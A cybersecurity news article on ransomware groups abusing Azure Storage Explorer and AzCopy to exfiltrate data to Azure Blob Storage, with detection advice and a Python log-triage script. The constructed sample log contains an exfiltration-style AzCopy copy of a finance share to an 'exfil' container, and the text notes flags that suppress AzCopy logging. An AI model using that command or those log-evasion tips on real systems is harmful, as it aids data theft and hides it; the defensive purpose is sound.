Recent findings by cybersecurity firm modePUSH indicate that ransomware operators such as BianLian and Rhysida are abusing Microsoft's Azure Storage Explorer and AzCopy, two legitimate data-transfer tools, to siphon data from victim networks into Azure Blob Storage.
BianLian is a ransomware group known for its cyberattacks targeting various organizations, primarily in the healthcare sector. Rhysida is another ransomware group that has been active in recent years. Like BianLian, they typically employ a double extortion tactic, encrypting victims' data and threatening to leak sensitive information if a ransom is not paid.
Technique Overview
Azure Storage Explorer is a graphical client for managing Azure storage resources, while AzCopy is a command-line tool built for moving large volumes of data. Both have been observed in use by the attackers to push stolen data into Azure Blob Storage containers, from which it is later moved to private repositories.
Researchers noted that to run Azure Storage Explorer the attackers first had to install its dependencies and upgrade the host to .NET 8; installation of those components on a server with no business need for them is itself an artifact worth alerting on. The preference for Azure among these groups stems from its wide acceptance in enterprise environments, which means fewer controls stand in the way of outbound transfers.
Its ability to manage extensive data volumes efficiently is also attractive to attackers aiming to extract significant data quantities swiftly. According to modePUSH analysts, ransomware groups deployed multiple instances of Azure Storage Explorer to accelerate uploads to Azure Blob.
Detection and Defense Strategies
Security teams can look for AzCopy's log files, written by default to %USERPROFILE%\.azcopy on Windows (~/.azcopy on Linux and macOS). Each job gets its own log recording the command line and every file transferred, which exposes the source paths and the destination storage account. Two caveats apply: the log sits under the profile of the account the attacker is using and can simply be deleted, and AzCopy's --log-level NONE flag or the AZCOPY_LOG_LOCATION environment variable lets the attacker suppress or relocate it, so an absent log is not evidence that no transfer occurred.
Practical controls include alerting on execution of azcopy.exe and StorageExplorer.exe on hosts where they have no business purpose, inspecting outbound traffic to Azure Blob endpoints (*.blob.core.windows.net) and distinguishing the organization's own storage accounts from unknown ones, and watching for unusual bulk file access on key servers. Because Azure Storage Explorer keeps its signed-in session between launches, organizations should also enable its 'Logout on Exit' setting so that a session left on a compromised host cannot be reused to reach the organization's own storage.
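As an added example for this article (not code from modePUSH, Microsoft or the groups discussed), the following Python script parses a constructed AzCopy-style log excerpt, reconstructs each job's source and destination, and flags uploads to storage accounts outside a hypothetical allowlist. The sample log only approximates AzCopy's "Job-Command" and "Starting transfer" lines, and APPROVED_ACCOUNTS is an assumed allowlist; confirm the regexes against a real log from your own AzCopy version before relying on them.

```python
"""Triage AzCopy logs for uploads to Azure Blob accounts the organization does not own.

Added example for this article; not code from modePUSH or Microsoft.
Assumptions: the constructed SAMPLE_LOG approximates AzCopy's log layout,
and APPROVED_ACCOUNTS is a hypothetical allowlist of known storage accounts.
"""
import os
import re
import shlex
from pathlib import Path

# Hypothetical allowlist: storage accounts with a legitimate business purpose.
APPROVED_ACCOUNTS = {"corpbackupsprod"}

# Storage account names are 3-24 lowercase alphanumerics; stop the container
# at '/', whitespace, a quote or a '?' (start of a SAS token).
BLOB_URL = re.compile(r'https://([a-z0-9]{3,24})\.blob\.core\.windows\.net/([^/\s"?]*)')
JOB_CMD = re.compile(r"Job-Command (.*)")
TRANSFER = re.compile(r'Starting transfer: Source "([^"]+)" Destination "([^"]+)"')


def default_log_dir() -> Path:
    """Default AzCopy log directory: %USERPROFILE%\\.azcopy on Windows, ~/.azcopy elsewhere."""
    return Path(os.path.expanduser("~")) / ".azcopy"


def _strip_quotes(tok: str) -> str:
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def parse_job_command(cmd: str) -> dict:
    """Split an AzCopy command line into verb, source, destination and flags.
    posix=False keeps Windows backslashes and quoted paths intact. Assumes the
    usual 'azcopy <verb> <source> <destination> [--flags]' ordering."""
    tokens = [_strip_quotes(t) for t in shlex.split(cmd, posix=False)]
    verb = tokens[0] if tokens else ""
    positional = [t for t in tokens[1:3] if not t.startswith("--")]
    flags = [t for t in tokens[1:] if t.startswith("--")]
    source = positional[0] if len(positional) > 0 else ""
    destination = positional[1] if len(positional) > 1 else ""
    return {"verb": verb, "source": source, "destination": destination, "flags": flags}


def analyze_log(text: str) -> dict:
    """Summarize one AzCopy log: each job, every local source file handed to a
    transfer, the blob accounts/containers touched, and which accounts fall
    outside the allowlist. An 'upload' is a job whose destination is a blob
    URL and whose source is not (the exfiltration direction)."""
    jobs, sources, accounts = [], [], {}
    for line in text.splitlines():
        m = JOB_CMD.search(line)
        if m:
            job = parse_job_command(m.group(1))
            dst = BLOB_URL.match(job["destination"])
            job["upload"] = bool(dst) and not BLOB_URL.match(job["source"])
            job["dest_account"] = dst.group(1) if dst else None
            jobs.append(job)
        m = TRANSFER.search(line)
        if m:
            sources.append(m.group(1))
        for acct, container in BLOB_URL.findall(line):
            accounts.setdefault(acct, set()).add(container)
    return {
        "jobs": jobs,
        "sources": sources,
        "accounts": {a: sorted(c) for a, c in accounts.items()},
        "unapproved_accounts": sorted(a for a in accounts if a not in APPROVED_ACCOUNTS),
        # Only an upload to an account we do not recognise counts as suspicious.
        "suspicious_upload": any(j["upload"] and j["dest_account"] not in APPROVED_ACCOUNTS
                                 for j in jobs),
    }


def scan_log_dir(directory: Path) -> list:
    """Run analyze_log over every *.log file in an AzCopy log directory and
    return (filename, summary) for logs that contain a suspicious upload."""
    findings = []
    for log in sorted(directory.glob("*.log")):
        summary = analyze_log(log.read_text(errors="replace"))
        if summary["suspicious_upload"]:
            findings.append((log.name, summary))
    return findings


# Constructed sample in an AzCopy-like layout; not a real capture.
SAMPLE_LOG = r"""2024/09/10 14:22:01 AzcopyVersion 10.25.1
2024/09/10 14:22:01 OS-Environment windows
2024/09/10 14:22:01 Job-Command copy "C:\Shares\Finance" https://stor4x9q2z.blob.core.windows.net/exfil --recursive --log-level=INFO
2024/09/10 14:22:02 INFO: [P#0-T#0] Starting transfer: Source "C:\Shares\Finance\payroll.xlsx" Destination "https://stor4x9q2z.blob.core.windows.net/exfil/payroll.xlsx"
2024/09/10 14:22:02 INFO: [P#0-T#1] Starting transfer: Source "C:\Shares\Finance\contracts.zip" Destination "https://stor4x9q2z.blob.core.windows.net/exfil/contracts.zip"
2024/09/10 14:22:05 INFO: [P#0-T#0] Transfer SUCCESS
2024/09/10 15:01:00 Job-Command copy https://corpbackupsprod.blob.core.windows.net/backups "D:\Restore" --recursive
"""

if __name__ == "__main__":
    result = analyze_log(SAMPLE_LOG)
    print("unapproved accounts:", result["unapproved_accounts"])
    print("suspicious upload:", result["suspicious_upload"])
    for job in result["jobs"]:
        print(job["verb"], job["source"], "->", job["destination"], "upload" if job["upload"] else "download")
    print("files staged:", result["sources"])
```

Run it against the real directory with scan_log_dir(default_log_dir()) on a host under investigation; the second job in the sample (a download from the approved backup account) shows why the direction check matters, since flat matching on blob.core.windows.net alone would flag routine restores.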
Ransomware groups frequently employ specialized exfiltration tools, often including Rclone for synchronization with various cloud providers and MEGAsync for interaction with the MEGA cloud. Despite the diversity of tools used, a commonality exists in their exploitation of trusted enterprise-grade services like Azure.
Given its widespread adoption by corporations, Azure is less likely to face restrictions imposed by corporate firewalls and security measures. Consequently, data transfer attempts via Azure are more likely to bypass detection and proceed unobstructed. Furthermore, Azure's scalability and performance capabilities, enabling the handling of substantial volumes of unstructured data, prove invaluable to attackers seeking to exfiltrate large quantities of files within the shortest feasible timeframe.